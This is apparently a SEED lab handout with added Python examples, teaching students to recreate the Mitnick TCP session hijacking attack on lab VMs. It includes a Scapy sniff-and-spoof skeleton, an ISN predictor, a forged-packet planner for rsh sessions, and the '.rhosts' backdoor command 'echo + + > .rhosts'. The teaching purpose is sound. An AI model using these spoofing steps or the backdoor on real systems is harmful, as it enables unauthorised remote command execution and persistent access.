The Mitnick Attack Lab

Official original document

1. Overview

Kevin Mitnick is probably one of the most well-known hackers in the USA. He was on the FBI's wanted list. While on the run, he became interested in hacking cellular phone networks and needed specialized software to help him do that. That led him to Tsutomu Shimomura (a Japanese-American computer security and computational physics researcher, son of Osamu Shimomura, the 2008 Nobel laureate in Chemistry), a researcher at the San Diego Supercomputer Center and one of the leading researchers on the security of cellular phone networks. He had the code that Mitnick wanted.

In 1994, Mitnick successfully launched an attack on Shimomura's computer by exploiting vulnerabilities in the TCP protocol and the trust relationship between two of Shimomura's computers. The attack triggered a dramatic showdown between the two, which eventually led to Mitnick's arrest. The showdown was later turned into books and Hollywood movies. The attack is now known as the Mitnick attack, a special type of TCP session hijacking.

The objective of this lab is to recreate the classic Mitnick attack so that students can gain firsthand experience with such an attack. We will emulate the setting that originally existed on Shimomura's computers, and then launch the Mitnick attack to create a forged TCP session between two of Shimomura's computers. If the attack is successful, we should be able to run any command on Shimomura's computer. This lab covers the following topics:

  • TCP session hijacking attack

  • TCP three-way handshake protocol

  • Remote shell (rsh)

  • Packet sniffing and spoofing


Readings and related topics. Detailed coverage of the TCP session hijacking attack can be found in the SEED book, Computer & Internet Security: A Hands-on Approach, 2nd Edition, by Wenliang Du.

Lab environment. This lab has been tested on our pre-built Ubuntu 16.04 VM, which can be downloaded from the SEED website. The lab requires three VMs.

2. How the Mitnick Attack Works

The Mitnick attack is a special case of TCP session hijacking. Instead of hijacking an existing TCP connection between victims A and B, the Mitnick attack first creates a TCP connection between A and B on their behalf, and then naturally hijacks that connection.

In the actual Mitnick attack, host A was called X-Terminal, and it was the target. Mitnick wanted to log into X-Terminal and run his commands on it. Host B was a trusted server, which was allowed to log into X-Terminal without a password. To log into X-Terminal, Mitnick had to impersonate the trusted server, so that no password would be required. Figure 1 depicts the high-level picture of the attack. There are four primary steps.

Step 1: Sequence number prediction. Before the attack, Mitnick needed to learn the pattern of the initial sequence numbers (ISNs) on X-Terminal (in those days, ISNs were not random). He sent SYN requests to X-Terminal and received SYN+ACK responses, then sent a RESET packet to X-Terminal to clear the half-open connection from X-Terminal's queue (to prevent the queue from filling up). After repeating this twenty times, he found a pattern between successive TCP ISNs. This allowed Mitnick to predict ISNs, which was essential for the attack: the spoofed ACK in Step 3 must acknowledge the ISN of a SYN+ACK he would never see, and the prediction only holds if no other connection to X-Terminal consumes an ISN in between.
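
To make the prediction step concrete, here is an added example in plain Python (it is not part of the SEED lab). It takes the ISNs returned by a series of probes, checks whether successive values differ by a constant, and if so predicts the ISN of the SYN+ACK the attacker will never see. The probe values are constructed for illustration; the constant increment of 128000 is the per-connection step Shimomura reported for the real X-Terminal, while the "modern" list is seeded pseudo-random data standing in for a randomized ISN generator.

```python
#!/usr/bin/env python3
"""Predicting a host's next TCP initial sequence number (ISN) from probes.

Added example for this page, not SEED lab code. It models Step 1 of the
Mitnick attack with constructed probe results: a 1990s-style generator
that bumps the ISN by a constant per connection, and a randomized
generator for contrast.
"""
import random

MOD32 = 1 << 32  # ISNs are 32-bit, so all arithmetic wraps modulo 2**32


def isn_deltas(isns):
    """Differences between successive observed ISNs, modulo 2**32."""
    return [(b - a) % MOD32 for a, b in zip(isns, isns[1:])]


def predict_next_isn(isns, min_probes=3):
    """Predict the next ISN if the host uses a constant per-connection step.

    Each probe (SYN, read the SYN+ACK, then RST) yields one ISN. If every
    successive difference is identical, the next ISN is last + delta.
    Returns None when no constant-increment pattern is present.
    """
    if len(isns) < min_probes:
        raise ValueError("need at least %d probes" % min_probes)
    deltas = isn_deltas(isns)
    if len(set(deltas)) != 1:
        return None
    return (isns[-1] + deltas[0]) % MOD32


def guess_window(predicted, radius, step):
    """Candidate ISNs around a prediction, for the case where an unseen
    connection to the target may have consumed a few steps in between."""
    return [(predicted + k * step) % MOD32 for k in range(-radius, radius + 1)]


# --- constructed probe results -------------------------------------------
# Old-style host: the ISN grows by a fixed amount per accepted connection.
STEP = 128000                                   # increment Shimomura reported
PROBES_OLD = [(0x4E1000 + i * STEP) % MOD32 for i in range(20)]

# Modern host: per-connection ISNs drawn from a random generator
# (seeded pseudo-random data here, constructed for the example).
_rng = random.Random(20200216)
PROBES_MODERN = [_rng.getrandbits(32) for _ in range(20)]


def demo():
    """Run the predictor against both constructed probe sets."""
    return predict_next_isn(PROBES_OLD), predict_next_isn(PROBES_MODERN)


if __name__ == "__main__":
    old, modern = demo()
    print("constant-increment host: next ISN ->", old)
    print("randomized host:         next ISN ->", modern)
```

The second result is None: once ISNs are randomized, the predictor has nothing to extrapolate from, which is exactly why the lab lets students sniff the SYN+ACK instead of guessing it.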

Step 2: SYN flooding attack on the trusted server. To send a connection request from the trusted server to X-Terminal, Mitnick needed to send a SYN packet, apparently from the trusted server, to X-Terminal. X-Terminal would respond with a SYN+ACK packet, sent to the trusted server. Since the trusted server had not actually initiated the request, it would reply with a RESET packet, telling X-Terminal to abort the three-way handshake. This behavior would break the attack. To solve the problem, Mitnick had to silence the trusted server, so before spoofing he launched a SYN flooding attack against it. Back then, operating systems were far more vulnerable to SYN flooding: the attack could actually bring the trusted server down, silencing it completely.

Step 3: Spoofing a TCP connection. Mitnick wanted to use rsh (remote shell) to run a backdoor command on X-Terminal; once the backdoor was set up, he could log into X-Terminal. To run a remote shell on X-Terminal, Mitnick needed to pass authentication, i.e. he needed a valid account on X-Terminal and its password. Obviously, he had neither.

Shimomura often needed to log into X-Terminal from the trusted server. To avoid typing a password each time, he added an entry to the .rhosts file on X-Terminal, so that when he logged into X-Terminal from the trusted server no password would be asked. This was quite a common practice back then. With this setup, Shimomura could run a command on X-Terminal from the trusted server using rsh, or use rlogin to log into X-Terminal, without typing any password. Mitnick wanted to exploit this trust relationship.

He needed to create a TCP connection between the trusted server and X-Terminal, and then run rsh inside this connection. He first sent a SYN request to X-Terminal using the trusted server's IP as the source address. X-Terminal then sent a SYN+ACK response to the server. Since the server had been brought down, it did not send a RESET to close the connection.

To complete the three-way handshake, Mitnick needed to spoof an ACK packet that acknowledged the sequence number in X-Terminal's SYN+ACK packet. Unfortunately, the SYN+ACK response went only to the trusted server, not to Mitnick, so he could not see that sequence number. However, thanks to his prior investigation, Mitnick was able to predict what the number was, so he could spoof the ACK to X-Terminal and complete the TCP three-way handshake.

Step 4: Running a remote shell. Using the established TCP connection between the trusted server and X-Terminal, Mitnick could send a remote shell request to X-Terminal asking it to run a command. With this command, Mitnick wanted to create a backdoor on X-Terminal so that he could get a shell on it at any time without repeating the attack.

All he needed to do was add "+ +" to the .rhosts file on X-Terminal, which he could achieve by running the command "echo + + > .rhosts" on X-Terminal via rsh. Since rsh and rlogin use the .rhosts file for authentication, with this addition X-Terminal would trust every rsh and rlogin request, from any host and any user.

3. Lab Setup

We need three VMs for this lab: one for X-Terminal, one for the trusted server, and one for the attacker. In the real Mitnick attack, the attacker's machine was a remote machine. In this lab, for the sake of simplicity, we put all three VMs on the same network.

3.1 Installing the rsh program

The remote shell rsh is a command-line program that executes shell commands remotely. Although we use rsh in this task, we should know that the rsh and rlogin programs are not secure and are no longer used. They have been replaced by more secure programs such as ssh. That is why, in modern Linux distributions, the rsh command is actually a symbolic link to the ssh program. See the following:

$ ls -al /etc/alternatives | grep rsh
lrwxrwxrwx 1 root root 12 Jul 25  2017 rsh -> /usr/bin/ssh

To recreate the Mitnick attack, we need to install the insecure version of the rsh program. The old rsh no longer works, but an open-source project called rsh-redone reimplements the remote shell client and server. It is not installed on our VM yet, so we use the following commands to install the rsh server and client on all three VMs.

$ sudo apt-get install rsh-redone-client
$ sudo apt-get install rsh-redone-server

3.2 Configuration

The rsh server program uses two files for authentication: /etc/hosts.equiv and .rhosts. Every time the server receives a remote command request, it first checks /etc/hosts.equiv. If the request comes from a host listed in that file, the server accepts it without asking for a password. If /etc/hosts.equiv does not exist or does not list that host, rshd then checks the .rhosts file in the target user's home directory.

Shimomura often needed to run remote commands on X-Terminal from the trusted server. To avoid typing passwords, he created a .rhosts file on X-Terminal and put the trusted server's IP address into it. Note that the .rhosts file must reside at the top level of the user's home directory and must be writable only by its owner. Use the following commands on X-Terminal to do the setup.

$ touch .rhosts
$ echo [Server's IP address] > .rhosts
$ chmod 644 .rhosts

To verify your configuration, try running the following command on the trusted server.

$ rsh [X-Terminal's IP] date

If the command prints the current date and time, your configuration is working. If you see "Authentication Failure", something in your setup is not correct. One common mistake is the permissions on the .rhosts file: make sure it is writable only by its owner.

Allow all. To allow users from any IP address to execute commands on X-Terminal, we only need to put two plus signs ("+ +") on a line in the .rhosts file. This is very dangerous, and nobody should do it. But for an attacker it is a convenient way to set up a backdoor; as mentioned before, this is what was used in the Mitnick attack.
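
To make the lookup order and the "+ +" wildcard concrete, here is an added example (it is not rsh-redone's code) that models rshd's password-less authentication decision in Python. It follows the behaviour described in this section: /etc/hosts.equiv is consulted first, then the target user's .rhosts; each entry is "host [user]", where "+" matches anything; and .rhosts is ignored when it is writable by group or others, which is the common cause of "Authentication Failure". File contents, file modes, addresses and user names are passed in as constructed values so the model runs anywhere; the exact checks rsh-redone performs may differ in detail.

```python
#!/usr/bin/env python3
"""Model of rshd's password-less authentication decision.

Added example, not rsh-redone's source. Encodes the behaviour the lab
describes: /etc/hosts.equiv first, then ~target_user/.rhosts; entries are
"host [user]" with "+" as a wildcard; .rhosts only counts when it is a
regular file writable by its owner alone. Inputs are strings and modes
rather than real files so the model runs without an rsh installation.
"""
import stat


def parse_entries(text):
    """Yield (host, user) pairs from hosts.equiv/.rhosts text.

    A missing user field means "the same user name as on the client".
    Blank lines and '#' comments are skipped (an assumption of this model).
    """
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        yield fields[0], (fields[1] if len(fields) > 1 else None)


def entry_matches(host, user, client_host, client_user, target_user):
    """Does one entry authorize client_user@client_host to act as target_user?"""
    host_ok = host == "+" or host == client_host
    if user is None:
        user_ok = client_user == target_user
    else:
        user_ok = user == "+" or user == client_user
    return host_ok and user_ok


def rhosts_file_trusted(mode):
    """.rhosts must be a regular file and not writable by group or others."""
    return stat.S_ISREG(mode) and not (mode & (stat.S_IWGRP | stat.S_IWOTH))


def rsh_allows(client_host, client_user, target_user,
               hosts_equiv=None, rhosts=None, rhosts_mode=0o100644):
    """Return True if rshd would run the command without asking a password."""
    # 1. /etc/hosts.equiv (None means the file does not exist)
    if hosts_equiv is not None:
        for host, user in parse_entries(hosts_equiv):
            if entry_matches(host, user, client_host, client_user, target_user):
                return True
    # 2. ~target_user/.rhosts, only if its permissions are acceptable
    if rhosts is None or not rhosts_file_trusted(rhosts_mode):
        return False
    for host, user in parse_entries(rhosts):
        if entry_matches(host, user, client_host, client_user, target_user):
            return True
    return False


if __name__ == "__main__":
    # Shimomura's setup: only the trusted server, same user, no password.
    print(rsh_allows("10.0.2.7", "seed", "seed", rhosts="10.0.2.7\n"))   # True
    print(rsh_allows("10.0.2.8", "seed", "seed", rhosts="10.0.2.7\n"))   # False
    # Same file, but world-writable: rshd ignores it.
    print(rsh_allows("10.0.2.7", "seed", "seed", rhosts="10.0.2.7\n",
                     rhosts_mode=0o100666))                               # False
    # Mitnick's backdoor: any host, any user.
    print(rsh_allows("203.0.113.5", "mallory", "seed", rhosts="+ +\n"))  # True
```

The last case is the point of Task 3: a single "+ +" line turns the per-host trust Shimomura configured into trust of everyone, which is why the lab calls it a backdoor.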

4. Task 1: Simulated SYN Flooding

The operating systems at the time of the Mitnick attack were vulnerable to SYN flooding attacks, which could mute the target machine or even shut it down. However, SYN flooding can no longer cause such damage to modern operating systems. To simulate this effect, we will disconnect the trusted server from the network, so it is completely "muted". Click the network icon in the upper-right corner of the desktop and choose Disconnect.

When X-Terminal receives a SYN packet from the trusted server, it responds with a SYN+ACK packet. Before sending that packet, it needs the MAC address of the trusted server, so it checks its ARP cache first. If there is no entry for the trusted server, X-Terminal broadcasts an ARP request asking for the MAC address. Since the trusted server has been muted, nobody answers the ARP request, so X-Terminal cannot send its response, and the TCP connection will not be established.

In the real attack, the trusted server's MAC address was already in X-Terminal's ARP cache. Even if it had not been, before silencing the trusted server we could simply spoof an ICMP echo request from the trusted server to X-Terminal; X-Terminal would reply to the trusted server, which requires resolving the trusted server's MAC address and saves it in the cache.

To simplify the task, before disconnecting the trusted server we simply ping it once from X-Terminal, then use the arp command to check that the MAC address is in the cache. Note that the operating system may delete the cache entry if it fails to reach the destination using the cached MAC address. To simplify your attack, you can run the following command on X-Terminal to add a permanent entry to the ARP cache:

$ sudo arp -s [Server's IP] [Server's MAC]

5. Task 2: Spoof TCP Connections and rsh Sessions

Now that we have "brought down" the trusted server, we can impersonate it and try to launch an rsh session with X-Terminal. Since rsh runs on top of TCP, we first need to establish a TCP connection between the trusted server and X-Terminal, and then run rsh inside that connection.

One of the difficulties in the Mitnick attack is predicting the TCP sequence numbers. That was possible back then because TCP sequence numbers were not randomized. Modern operating systems randomize their initial sequence numbers (as a countermeasure against TCP session hijacking), so predicting them is infeasible. To simulate the situation of the original Mitnick attack, we allow students to sniff packets, so they can read the sequence numbers instead of guessing them.

Restriction. To simulate the original Mitnick attack as closely as we can, even though students can sniff the TCP packets from X-Terminal, they may not use every field of the captured packets, because in the real attack Mitnick could not sniff packets at all. When students write their attack programs, they may use only the following fields from the captured packets. A penalty will be applied if other fields are used.

  • The TCP sequence number field (this does not include the acknowledgment number field).

  • The TCP flags field. This lets us know the type of each captured TCP packet. In the actual Mitnick attack, Mitnick knew exactly what type of packet X-Terminal would send out, because they are part of the TCP three-way handshake. We allow students to use this field to simplify the task.

  • All the length fields, including the IP header length, the IP total length, and the TCP header length. These are not necessary for the attack; in the actual Mitnick attack, Mitnick knew exactly what their values were. We allow students to use these fields to simplify the task.

The behavior of rsh. To create a spoofed rsh session between the trusted server and X-Terminal, we need to understand how rsh behaves. Let us start an rsh session from Host A to Host B and use Wireshark to capture the packets between them. We use the following command to run date on Host B from Host A via the rsh remote shell.

# On Host A
$ rsh [B's IP] date

The packet trace of this rsh session is shown below. Here 10.0.2.7 is Host A's IP address and 10.0.2.6 is Host B's. If a packet carries no TCP data, the length information (Len=0) is omitted.

Listing 1: Packet trace of an rsh session

# The first connection
No. SRC IP    DEST IP   TCP header
1   10.0.2.7  10.0.2.6  1023 -> 514   [SYN]      Seq=778933536
2   10.0.2.6  10.0.2.7  514 -> 1023   [SYN,ACK]  Seq=10879102    Ack=778933537
3   10.0.2.7  10.0.2.6  1023 -> 514   [ACK]      Seq=778933537   Ack=10879103
4   10.0.2.7  10.0.2.6  1023 -> 514   [ACK]      Seq=778933537   Ack=10879103   Len=20
                                      RSH session establishment
                                      Data: 1022\x00seed\x00seed\x00date\x00
5   10.0.2.6  10.0.2.7  514 -> 1023   [ACK]      Seq=10879103    Ack=778933557

# The second connection
6   10.0.2.6  10.0.2.7  1023 -> 1022  [SYN]      Seq=3920611526
7   10.0.2.7  10.0.2.6  1022 -> 1023  [SYN,ACK]  Seq=3958269143  Ack=3920611527
8   10.0.2.6  10.0.2.7  1023 -> 1022  [ACK]      Seq=3920611527  Ack=3958269144

# Going back to the first connection
9   10.0.2.6  10.0.2.7  514 -> 1023   [ACK]      Seq=10879103    Ack=778933557   Len=1   Data: \x00
10  10.0.2.7  10.0.2.6  1023 -> 514   [ACK]      Seq=778933557   Ack=10879104
11  10.0.2.6  10.0.2.7  514 -> 1023   [ACK]      Seq=10879104    Ack=778933557   Len=29  Data: Sun Feb 16 13:41:17 EST 2020

We can observe that an rsh session consists of two TCP connections. The first connection is initiated by Host A (the client). An rshd process on Host B listens for connection requests on port 514. Packets 1 to 3 are the three-way handshake. After the connection has been established, the client sends the rsh data (including user IDs and the command) to Host B (Packet 4). rshd authenticates the user; if authentication succeeds, rshd initiates a separate TCP connection back to the client.

The second connection is used for sending error messages. In the trace above, since there was no error, this connection was never used, but it must be successfully established or rshd will not continue. Packets 6 to 8 are the three-way handshake of the second connection.

After the second connection has been established, Host B sends a single zero byte to the client over the first connection (Packet 9), which Host A acknowledges (Packet 10). After that, rshd on Host B runs the command sent by the client, and the command's output is sent back to the client (Packet 11), all via the first connection. Students can use Wireshark to capture an rsh session and study its behavior before launching the Mitnick attack. We divide the attack into two sub-tasks, each focusing on one connection.

We will use Scapy for most of the tasks in this lab. The current version of the SEED VM may not have Scapy installed for Python 3. We can use the following command to install Scapy for Python 3.

$ sudo pip3 install scapy

5.1 Task 2.1: Spoof the First TCP Connection

The first TCP connection is initiated by the attacker via a spoofed SYN packet. As shown in Figure 2, after X-Terminal receives the SYN packet, it sends a SYN+ACK packet to the trusted server. Since the server has been brought down, it will not reset the connection. The attacker, who is on the same network, can sniff the packet and obtain the sequence number.

Step 1: Spoof a SYN packet. Students should write a program to spoof a SYN packet from the trusted server to X-Terminal (see Packet 1 in Listing 1). There are six standard TCP code bits, which are set in the flags field of the TCP header. The following code shows how to set the flags field and how to check whether certain bits are set in it.

# 'U': URG bit
# 'A': ACK bit
# 'P': PSH bit
# 'R': RST bit
# 'S': SYN bit
# 'F': FIN bit

from scapy.all import TCP

tcp = TCP()

# Set the SYN and ACK bits
tcp.flags = "SA"

# Check whether SYN and ACK are the only bits set
if tcp.flags == "SA":
    print("exactly SYN+ACK")

# Check whether the SYN and ACK bits are set (other bits may be set too)
if 'S' in tcp.flags and 'A' in tcp.flags:
    print("SYN and ACK are both set")

Note that the source port of the SYN packet must be 1023: rsh connects from a reserved port, and if a different port is used, rsh will reset the connection after it is established. If this step succeeds, in Wireshark we should see a SYN+ACK packet coming out of X-Terminal (see Packet 2 in Listing 1).


Step 2: Respond to the SYN+ACK packet. After X-Terminal sends out the SYN+ACK, the trusted server needs to send an ACK packet to complete the three-way handshake. The acknowledgment number in that packet should be S+1, where S is the sequence number contained in the SYN+ACK packet. See Packet 3 in Listing 1.

In the actual Mitnick attack, the attacker could not see the SYN+ACK packet, because it was sent to the trusted server, not to the attacker. That is why Mitnick had to guess the value of the sequence number. In this lab, we allow students to obtain the sequence number via packet sniffing.

Students need to write a sniff-and-spoof program using Scapy and run it on the attacker's machine. Here is a skeleton of a sniff-and-spoof program that may be useful. Make sure to follow the restrictions described at the beginning of this section, or you will receive a penalty.

#!/usr/bin/python3
from scapy.all import *

x_ip = "10.0.2.6"     # X-Terminal
x_port = 514          # Port number used by X-Terminal

srv_ip = "10.0.2.7"   # The trusted server
srv_port = 1023       # Port number used by the trusted server

# Add 1 to the sequence number used in the spoofed SYN
seq_num = 0x1000 + 1


def spoof(pkt):
    global seq_num  # We will update this global variable in the function

    old_ip = pkt[IP]
    old_tcp = pkt[TCP]

    # Print out debugging information
    tcp_len = old_ip.len - old_ip.ihl*4 - old_tcp.dataofs*4  # TCP data length
    print("{}:{} -> {}:{} Flags={} Len={}".format(old_ip.src, old_tcp.sport,
          old_ip.dst, old_tcp.dport, old_tcp.flags, tcp_len))

    # Construct the IP header of the response
    ip = IP(src=srv_ip, dst=x_ip)

    # Check whether it is a SYN+ACK packet or not;
    # if it is, spoof an ACK packet
    if old_tcp.flags == "SA":
        # ... Add code here ...
        pass


myFilter = 'tcp'  # You need to make the filter more specific
sniff(filter=myFilter, prn=spoof)

Step 3: Spoof the rsh data packet. Once the connection is established, the attacker needs to send rsh data to X-Terminal. The structure of the rsh data is shown below.

[port number]\x00[uid_client]\x00[uid_server]\x00[your command]\x00

The data has four parts: a port number, the client's user ID, the server's user ID, and a command. The port number is the one the client will listen on for the second connection (see Task 2.2). Both the client's and the server's user ID are seed in our VM. The four fields are separated by a zero byte, and note that the rsh data also ends with a zero byte. An example is given below: we tell X-Terminal that we are going to listen on port 9090 for the second connection, and that the command we want to run is "touch /tmp/xyz".

# The IP() and TCP() headers must carry the addresses, ports, ACK flag and the
# sequence/acknowledgment numbers of the connection established in Steps 1-2
data = '9090\x00seed\x00seed\x00touch /tmp/xyz\x00'
send(IP()/TCP()/data, verbose=0)

Students should modify the sniff-and-spoof program written in Step 2 so that an rsh data packet is sent to X-Terminal (see Packet 4 in Listing 1). If this step succeeds, in Wireshark we can see X-Terminal initiate a TCP connection to port 9090 of the trusted server, the port number specified in our rsh data.

In your report, describe whether the touch command has been executed on X-Terminal or not. Also include your Wireshark screenshots.


5.2 Task 2.2: Spoof the Second TCP Connection

After the first connection has been established, X-Terminal initiates the second connection, which rshd uses to send error messages. Our attack does not use this connection, but if it is not established, rshd stops without executing our command. Therefore, we need to use spoofing to help X-Terminal and the trusted server finish establishing it. See Figure 3.

Students need to write another sniff-and-spoof program that sniffs the TCP traffic going to port 9090 of the trusted server (assuming 9090 was used in Task 2.1). When it sees a SYN packet, it should respond with a SYN+ACK packet whose acknowledgment number is the SYN's sequence number plus one; the SYN+ACK's own sequence number is chosen by the attacker. See Packet 7 in Listing 1 for an example.

If both connections have been successfully established, rshd will execute the command contained in the rsh data packet. Check the /tmp folder on X-Terminal to see whether /tmp/xyz has been created and whether its timestamp matches the present time. Include this evidence in your report.
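
As a check on the sequence-number arithmetic needed in Tasks 2.1 and 2.2, and on the rsh data format from Step 3, here is an added example that is not part of the lab handout. It is plain Python, needs no Scapy and sends nothing. From only the fields the lab allows students to use (the sniffed sequence numbers, flags and lengths), it computes the seq/ack numbers of every packet the attacker forges on the trusted server's behalf, the acknowledgment numbers X-Terminal should reply with, and the port of the second connection read back out of the rsh data. demo() reproduces the values in Listing 1; the Pkt structure and the addresses are this example's own assumptions.

```python
#!/usr/bin/env python3
"""Planner for the spoofed packets of a forged rsh session (Tasks 2.1/2.2).

Added example, not SEED lab code. No Scapy, no packets sent: it only
computes what each forged segment must contain, using TCP's rules that a
SYN consumes one sequence number and data advances seq by its length.
Constants follow the lab: 10.0.2.7 = trusted server, 10.0.2.6 = X-Terminal.
"""
from dataclasses import dataclass

RSH_PORT = 514        # rshd on X-Terminal
CLIENT_PORT = 1023    # rsh clients connect from a reserved port
MOD32 = 1 << 32       # 32-bit sequence space


def build_rsh_request(err_port, client_user, server_user, command):
    """Encode '<port>\\0<client user>\\0<server user>\\0<command>\\0'."""
    if not 1 <= err_port <= 65535:
        raise ValueError("bad stderr port")
    fields = (str(err_port), client_user, server_user, command)
    if any("\x00" in f for f in fields):
        raise ValueError("rsh fields may not contain NUL")
    return ("\x00".join(fields) + "\x00").encode()


def parse_rsh_request(data):
    """Inverse of build_rsh_request: (err_port, client_user, server_user, command)."""
    parts = data.split(b"\x00")
    if len(parts) != 5 or parts[4] != b"":
        raise ValueError("malformed rsh request")
    port = int(parts[0]) if parts[0] else 0   # 0: no stderr connection wanted
    if port and not 1 <= port <= 65535:
        raise ValueError("bad stderr port")
    return port, parts[1].decode(), parts[2].decode(), parts[3].decode()


@dataclass(frozen=True)
class Pkt:
    """The fields of a forged TCP segment that matter for the attack."""
    src: str
    dst: str
    sport: int
    dport: int
    flags: str
    seq: int
    ack: int = 0
    payload: bytes = b""

    def consumes(self):
        """Sequence space used by this segment: data bytes plus one per SYN/FIN."""
        return len(self.payload) + ("S" in self.flags) + ("F" in self.flags)

    def expected_ack(self):
        """Acknowledgment number the peer must send for this segment."""
        return (self.seq + self.consumes()) % MOD32


def plan_first_connection(srv_ip, x_ip, our_isn, x_synack_seq, request):
    """Packets 1, 3 and 4 of Listing 1, spoofed with the trusted server's IP.

    our_isn      : ISN chosen for the spoofed SYN.
    x_synack_seq : sequence number sniffed from X-Terminal's SYN+ACK
                   (the value Mitnick had to predict).
    """
    syn = Pkt(srv_ip, x_ip, CLIENT_PORT, RSH_PORT, "S", our_isn)
    nxt = (our_isn + 1) % MOD32           # our SYN consumed one number
    ack_no = (x_synack_seq + 1) % MOD32   # acknowledge X-Terminal's SYN
    ack = Pkt(srv_ip, x_ip, CLIENT_PORT, RSH_PORT, "A", nxt, ack_no)
    data = Pkt(srv_ip, x_ip, CLIENT_PORT, RSH_PORT, "A", nxt, ack_no, request)
    return syn, ack, data


def plan_second_connection(srv_ip, x_ip, x_syn_seq, our_isn2, request):
    """Packet 7: SYN+ACK from the stderr port named in the request, answering
    X-Terminal's SYN (Packet 6) whose sequence number we sniffed."""
    err_port = parse_rsh_request(request)[0]
    return Pkt(srv_ip, x_ip, err_port, CLIENT_PORT, "SA",
               our_isn2, (x_syn_seq + 1) % MOD32)


def demo():
    """Reproduce the numbers of Listing 1 (Host A = trusted server role)."""
    srv, x = "10.0.2.7", "10.0.2.6"
    req = build_rsh_request(1022, "seed", "seed", "date")
    syn, ack, data = plan_first_connection(srv, x, 778933536, 10879102, req)
    synack2 = plan_second_connection(srv, x, 3920611526, 3958269143, req)
    return syn, ack, data, synack2


if __name__ == "__main__":
    for p in demo():
        print(f"{p.src}:{p.sport} -> {p.dst}:{p.dport} [{p.flags}] "
              f"seq={p.seq} ack={p.ack} len={len(p.payload)}")
```

Two details matter when turning this into the Scapy programs: the data packet (Packet 4) reuses the seq/ack of the handshake ACK because the ACK carried no data, and the second connection's SYN+ACK must come from the exact port named in the request, otherwise rshd never sees its stderr connection complete and the command is never run.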


6. Task 3: Set Up a Backdoor

In Task 2, we only ran a touch command to prove that we can successfully run a command on X-Terminal. If we want to run more commands later, we could always launch the same attack again, but that is quite inconvenient.

Mitnick did plan to come back to X-Terminal. Instead of launching the attack again and again, he planted a backdoor on X-Terminal after his initial attack. This backdoor allowed him to log into X-Terminal normally, any time he wanted, without typing a password. As we have discussed before, all we need to do is add the string "+ +" to the .rhosts file (on a single line). We can include the following command in our rsh data.

echo + + > .rhosts

Students should replace the rsh command used in Task 2 with the echo command above and repeat the attack. If the attack succeeds, the attacker should be able to log into X-Terminal remotely with the following command, with no password needed:

$ rsh [X-Terminal's IP]

7. Submission

Students need to submit a detailed lab report describing what they have done, what they have observed, and how they interpret the results. Reports should include evidence to support the observations, such as packet traces and screenshots. Reports should also list the important code snippets with explanations. Simply attaching code without any explanation will not receive credit.